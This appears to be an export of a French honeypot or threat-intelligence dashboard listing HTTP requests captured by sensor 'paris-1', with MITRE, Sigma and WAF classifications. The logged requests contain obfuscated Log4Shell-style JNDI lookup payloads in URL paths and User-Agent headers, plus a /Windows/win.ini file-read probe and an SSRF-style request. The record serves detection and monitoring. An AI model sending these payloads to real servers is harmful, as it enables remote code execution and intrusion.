GET /http%3A%2F%2Fw00te8b527c1d.com HTTP/1.1 Host: 62.3.50.33:8200 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET /http%3A%2F%2Fw00te8b527c1d.com HTTP/1.1 Host: 62.3.50.33:8200 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8098 · HTTP | http | Scan de ports port scan syn · via HTTP:8098 · (reconnaissance) · → /login | Élevée | Moyen · 64 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
POST /login UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8098
Chemin / cible
/login
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Moyen
· 64
Confiance : Confiance 100 % — 4 tag(s) WAF
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8098 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Int
Requête brute (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8098 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Type: application/json Cont |
|||||||
| TCP | 8098 · HTTP | http | Scan de ports port scan syn · via HTTP:8098 · (reconnaissance) · → /${${q:tk6:bvd:-j}${4q38:sp:vgo8:-n}${7:3:-d}${… | Élevée | Moyen · 64 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
PUT /${${q:tk6:bvd:-j}${4q38:sp:vgo8:-n}${7:3:-d}${6d:w:-i}${7:-:}${6as:yg:-l}${h:qg:04w:-d}${zj:mbha:2… UA ${${5cr:uq:-j}${z:uf6:-n}${d:-d}${a9e:vq8:-i}${1rd:3:-:}${92dr:…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
PUT
/${${q:tk6:bvd:-j}${4q38:sp:vgo8:-n}${7:3:-d}${6d:w:-i}${7:-:}${6as:yg:-l}${h:qg:04w:-d}${zj:mbha:2:-a}${r5:e:gm4k:-p}${n0ce:rpm:7f:-:}${xqiu:dwn3:-/}${98w4:-/}${9:-P}${3ua:d:1gps:-A}${x2cu:lj6i:2xr:-l}${96vd:-0}${9j:drg:-c}${j85a:--}${${jp5:i9e:-s}${x4:j:s7:-y}${fy:7:a1x:-s}${c2d:mwr:gduf:-:}${w:s9c:-j}${vp:m4:unyq:-a}${7:-v}${8yp:-a}${2m:-.}${6j5:0:-v}${yn3:z8s0:idp:-e}${9mr8:xr:-r}${3k:-s}${r0j9:-i}${3:u:-o}${4t5:o40:-n}}${wx6t:-.}${y:h9:-9}${0f:yxwe:-e}${rnz:y5:92k:-f}${2fce:jt:a:-7}${c3sr:a1:f:-5}${d:p
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
PUT
Port
8098
Chemin / cible
/${${q:tk6:bvd:-j}${4q38:sp:vgo8:-n}${7:3:-d}${6d:w:-i}${7:-:}${6as:yg:-l}${h:qg:04w:-d}${zj:mbha:2:-a}${r5:e:gm4k:-p}${n0ce:rpm:7f:-:}${xqiu:dwn3:-/}${98w4:-/…
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Moyen
· 64
Confiance : Confiance 100 % — 4 tag(s) WAF
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${5cr:uq:-j}${z:uf6:-n}${d:-d}${a9e:vq8:-i}${1rd:3:-:}${92dr:-l}${wr1m:5w:-d}${p8:j:ofka:-a}${prt:-p}${5vnf:-:}${6zfb:36j:a:-/}${74fg:gd9:6l:-/}${ao:-U}${dn:b:tlg:-A}${wzx:p1dn:7kj:-l}${3:vk:-0}${h…
Règles WAF
rce-0
nosqli-3
Payload (extrait)
PUT /${${q:tk6:bvd:-j}${4q38:sp:vgo8:-n}${7:3:-d}${6d:w:-i}${7:-:}${6as:yg:-l}${h:qg:04w:-d}${zj:mbha:2:-a}${r5:e:gm4k:-p}${n0ce
Requête brute (extrait)
PUT /${${q:tk6:bvd:-j}${4q38:sp:vgo8:-n}${7:3:-d}${6d:w:-i}${7:-:}${6as:yg:-l}${h:qg:04w:-d}${zj:mbha:2:-a}${r5:e:gm4k:-p}${n0ce:rpm:7f:-:}${xqiu:dwn3:-/}${98w4:-/}${9:-P}${3ua:d:1gps:-A}${x2cu:lj6i:2xr:-l}${96vd:-0}${9j:drg:-c}${j85a:--}${${jp5:i9e:-s}${x
|
|||||||
| TCP | 8098 | — | Scan de ports port scan syn · port 8098 · (reconnaissance) | Faible | Moyen · 42 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
WAF
—
Recommandation
Surveiller
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
8098
Chemin / cible
—
Payload
ZSDLKFJ2 /${${iqj:-j}${z3n0:-n}${skvw:f2e:-d}${f:uv:1k:-i}${c:13:z:-:}${ot9y:y1:-l}${p3:bn:f72:-d}${os:0298:5:-a}${c5:-p}${5k:-:
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Moyen
· 42
Confiance : Confiance élevée (100 %) — signaux convergents
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
User-Agent
—
Règles WAF
—
Payload (extrait)
ZSDLKFJ2 /${${iqj:-j}${z3n0:-n}${skvw:f2e:-d}${f:uv:1k:-i}${c:13:z:-:}${ot9y:y1:-l}${p3:bn:f72:-d}${os:0298:5:-a}${c5:-p}${5k:-:
Requête brute (extrait)
ZSDLKFJ2 /${${iqj:-j}${z3n0:-n}${skvw:f2e:-d}${f:uv:1k:-i}${c:13:z:-:}${ot9y:y1:-l}${p3:bn:f72:-d}${os:0298:5:-a}${c5:-p}${5k:-:}${3:qz:-/}${nc:c14:-/}${skgd:-P}${y:de:i:-A}${zf1s:-l}${w:v6bd:-0}${7:-c}${j:--}${${cz:cv25:-s}${zr:xh:-y}${q:icg0:-s}${rq:s0h1
|
|||||||
| TCP | 8098 · HTTP | http | Scan de ports port scan syn · via HTTP:8098 · (reconnaissance) · → /login | Élevée | Moyen · 64 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
POST /login UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8098
Chemin / cible
/login
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Moyen
· 64
Confiance : Confiance 100 % — 4 tag(s) WAF
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 921130 duplicate CL
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8098 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Int
Requête brute (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8098 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Length: 2911 Content-Type: |
|||||||
| TCP | 8098 · HTTP | http | Scan de ports port scan syn · via HTTP:8098 · (reconnaissance) · → /${${0q:hl:-j}${mc:-n}${1ciz:-d}${cw:t:ci:-i}${… | Élevée | Moyen · 63 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET /${${0q:hl:-j}${mc:-n}${1ciz:-d}${cw:t:ci:-i}${xnvm:-:}${li2:-l}${mniu:9hi:kmw:-d}${zv2:-a}${u:748d… UA ${${60:og:w5b:-j}${o4q:9noj:-n}${pb:a:-d}${ha98:es:-i}${24z:ka6…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${0q:hl:-j}${mc:-n}${1ciz:-d}${cw:t:ci:-i}${xnvm:-:}${li2:-l}${mniu:9hi:kmw:-d}${zv2:-a}${u:748d:-p}${c8:kq4:o:-:}${kq1:cwm8:1r:-/}${ut:0su:5:-/}${cz:-P}${qw:skxt:-A}${wokt:ukw:-l}${18m:x7:3j:-0}${coyv:6sv:9:-c}${l:k:c:--}${${p:jph4:u83a:-s}${n:8t:-y}${ybum:8db:-s}${fte:hqx7:-:}${y:-j}${3:-a}${3:ihe:-v}${k5wx:4tp:wory:-a}${w8t:gn:-.}${p21:8u5:-v}${fv4y:4:4s:-e}${7vd:-r}${6l4:b:-s}${y9o:-i}${wm65:0:-o}${d2m:i80b:-n}}${743p:76:0mzj:-.}${gq4:-9}${yd:wgn:s:-e}${dib:y1:-f}${mn:te2:jtrq:-7}${3j:qb5h:5by9:-5}${
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8098
Chemin / cible
/${${0q:hl:-j}${mc:-n}${1ciz:-d}${cw:t:ci:-i}${xnvm:-:}${li2:-l}${mniu:9hi:kmw:-d}${zv2:-a}${u:748d:-p}${c8:kq4:o:-:}${kq1:cwm8:1r:-/}${ut:0su:5:-/}${cz:-P}${q…
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +16
Risque capteur
Moyen
· 63
Confiance : Confiance 100 % — 4 tag(s) WAF
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${60:og:w5b:-j}${o4q:9noj:-n}${pb:a:-d}${ha98:es:-i}${24z:ka6l:uycq:-:}${kig3:-l}${y26o:-d}${y6ip:271:ow6:-a}${y7:-p}${ow:7:-:}${vn:-/}${z:eci:-/}${70t:mka:jwkh:-U}${0n9d:h4:-A}${3gk:-l}${u3:-0}${z…
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${0q:hl:-j}${mc:-n}${1ciz:-d}${cw:t:ci:-i}${xnvm:-:}${li2:-l}${mniu:9hi:kmw:-d}${zv2:-a}${u:748d:-p}${c8:kq4:o:-:}${kq1:c
Requête brute (extrait)
GET /${${0q:hl:-j}${mc:-n}${1ciz:-d}${cw:t:ci:-i}${xnvm:-:}${li2:-l}${mniu:9hi:kmw:-d}${zv2:-a}${u:748d:-p}${c8:kq4:o:-:}${kq1:cwm8:1r:-/}${ut:0su:5:-/}${cz:-P}${qw:skxt:-A}${wokt:ukw:-l}${18m:x7:3j:-0}${coyv:6sv:9:-c}${l:k:c:--}${${p:jph4:u83a:-s}${n:8t:-
|
|||||||
| TCP | 8098 · HTTP | http | Scan de ports port scan syn · via HTTP:8098 · (reconnaissance) · → /${${f0jd:fdo:-j}${0d:g6j:-n}${2:cjhx:-d}${a:i0… | Élevée | Moyen · 63 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET /${${f0jd:fdo:-j}${0d:g6j:-n}${2:cjhx:-d}${a:i0:-i}${c6n:-:}${ri:nys:-l}${65ui:n:-d}${do1:-a}${arl:… UA ${${6aw:-j}${j:x5a1:-n}${6t9:r0ht:-d}${pkh:-i}${3ps:rjc:-:}${s:…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${f0jd:fdo:-j}${0d:g6j:-n}${2:cjhx:-d}${a:i0:-i}${c6n:-:}${ri:nys:-l}${65ui:n:-d}${do1:-a}${arl:-p}${yo6:7ui8:-:}${wjei:7y:2:-/}${gmwk:-/}${hjdz:csd:-P}${f5:89:-A}${8tyj:iy:-l}${mo38:51:0yta:-0}${4md:ko0:-c}${4y:--}${${u2j:7rx:0x:-s}${c:6:-y}${e7ux:2:-s}${y8pl:-:}${sqer:-j}${t3pr:lhtb:jt6z:-a}${z1:i86k:j31:-v}${gk:-a}${9i:-.}${a0:0wd4:08x:-v}${k6q:o3:3w:-e}${t5:-r}${t:d:-s}${szf:hsb:i:-i}${f6kj:g:x:-o}${sa:4:-n}}${2c:pbeo:2w6:-.}${9j:-9}${92h:-e}${m:cx:-f}${iu:zaq:du:-7}${1:cz:m8:-5}${lz:hvl:-3}${yc5k:-c
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8098
Chemin / cible
/${${f0jd:fdo:-j}${0d:g6j:-n}${2:cjhx:-d}${a:i0:-i}${c6n:-:}${ri:nys:-l}${65ui:n:-d}${do1:-a}${arl:-p}${yo6:7ui8:-:}${wjei:7y:2:-/}${gmwk:-/}${hjdz:csd:-P}${f5…
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +16
Risque capteur
Moyen
· 63
Confiance : Confiance 100 % — 4 tag(s) WAF
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${6aw:-j}${j:x5a1:-n}${6t9:r0ht:-d}${pkh:-i}${3ps:rjc:-:}${s:xr:3:-l}${bsk:c6:23:-d}${bg:srz:-a}${p:qtjn:eqb:-p}${i73h:-:}${7wp:whe:iqcm:-/}${5on9:-/}${hj9:xhw3:rj:-U}${ij:-A}${r0:nh:-l}${74:l3:snt…
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${f0jd:fdo:-j}${0d:g6j:-n}${2:cjhx:-d}${a:i0:-i}${c6n:-:}${ri:nys:-l}${65ui:n:-d}${do1:-a}${arl:-p}${yo6:7ui8:-:}${wjei:7
Requête brute (extrait)
GET /${${f0jd:fdo:-j}${0d:g6j:-n}${2:cjhx:-d}${a:i0:-i}${c6n:-:}${ri:nys:-l}${65ui:n:-d}${do1:-a}${arl:-p}${yo6:7ui8:-:}${wjei:7y:2:-/}${gmwk:-/}${hjdz:csd:-P}${f5:89:-A}${8tyj:iy:-l}${mo38:51:0yta:-0}${4md:ko0:-c}${4y:--}${${u2j:7rx:0x:-s}${c:6:-y}${e7ux:
|
|||||||
| TCP | 8098 · HTTP | http | Scan de ports port scan syn · via HTTP:8098 · (reconnaissance) | Élevée | Moyen · 63 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
POST / UA ${${2ogj:2a:-j}${es:dc3:-n}${f2cx:av35:j:-d}${fs8:icl:-i}${3:-:…
Émulateur
HTTP
WAF
23
Recommandation
Investiguer
Tags
Cible HTTP
POST
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8098
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +16
Risque capteur
Moyen
· 63
Confiance : Confiance 100 % — 4 tag(s) WAF
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${2ogj:2a:-j}${es:dc3:-n}${f2cx:av35:j:-d}${fs8:icl:-i}${3:-:}${dr:om:-l}${k:i:-d}${184j:y7:-a}${0y4e:-p}${ijn:-:}${tfo:l:-/}${r2i:8:sc:-/}${kc1f:z:-U}${d:-A}${604q:j:-l}${4:-0}${qj2z:-c}${1w:c3:--…
Règles WAF
rce-0
nosqli-3
rce-env-ifs
sap-sapcontrol-path
Payload (extrait)
POST / HTTP/1.1
Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8098
Accept: */*
User-Agent: ${${2ogj:2a:-j}${es:dc3:-n}${f2c
Requête brute (extrait)
POST / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8098 Accept: */* User-Agent: ${${2ogj:2a:-j}${es:dc3:-n}${f2cx:av35:j:-d}${fs8:icl:-i}${3:-:}${dr:om:-l}${k:i:-d}${184j:y7:-a}${0y4e:-p}${ijn:-:}${tfo:l:-/}${r2i:8:sc:-/}${kc1f:z:-U}${d:-A}
|
|||||||
| TCP | 8098 · HTTP | http | Scan de ports port scan syn · via HTTP:8098 · (reconnaissance) | Élevée | Moyen · 55 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8098
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +16
Risque capteur
Moyen
· 55
Confiance : Confiance 100 % — 3 tag(s) WAF
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8098 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8098 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 X-Forwarded-For: ${${n:5jp:hbv:-j}${h:-n}$
|
|||||||
| TCP | 8098 · HTTP | http | Scan de ports port scan syn · via HTTP:8098 · (reconnaissance) | Élevée | Moyen · 53 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET / UA ${${2rv:tbyc:gjpk:-j}${6y:n:-n}${zw1k:-d}${87r:x0:jo0:-i}${es:-…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8098
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +16
Risque capteur
Moyen
· 53
Confiance : Confiance 100 % — 3 tag(s) WAF
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Scan Burst
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${2rv:tbyc:gjpk:-j}${6y:n:-n}${zw1k:-d}${87r:x0:jo0:-i}${es:-:}${fu0h:9ap:n42:-l}${tep4:-d}${h:ywls:37:-a}${y2:-p}${ol:lvq:0wfs:-:}${d:-/}${c9:lsrm:-/}${n78h:-U}${s:-A}${iba:9:c:-l}${0mxa:-0}${c:q:…
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1
Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8098
Accept: */*
User-Agent: ${${2rv:tbyc:gjpk:-j}${6y:n:-n}${
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8098 Accept: */* User-Agent: ${${2rv:tbyc:gjpk:-j}${6y:n:-n}${zw1k:-d}${87r:x0:jo0:-i}${es:-:}${fu0h:9ap:n42:-l}${tep4:-d}${h:ywls:37:-a}${y2:-p}${ol:lvq:0wfs:-:}${d:-/}${c9:lsrm:-/}${n78h:-
|
|||||||
| TCP | 8090 · HTTP | http | Scan de ports port scan syn · via HTTP:8090 · (reconnaissance) · → /Windows/win.ini | Élevée | Élevé · 67 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET /Windows/win.ini UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
27
Recommandation
Investiguer
Tags
Cible HTTP
GET
/Windows/win.ini
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8090
Chemin / cible
/Windows/win.ini
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +16
Risque capteur
Élevé
· 67
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 930150 boot ini
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /Windows/win.ini HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8090 Accept: */* User-Agent: Mozilla/5.0 (Macin
Requête brute (extrait)
GET /Windows/win.ini HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8090 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||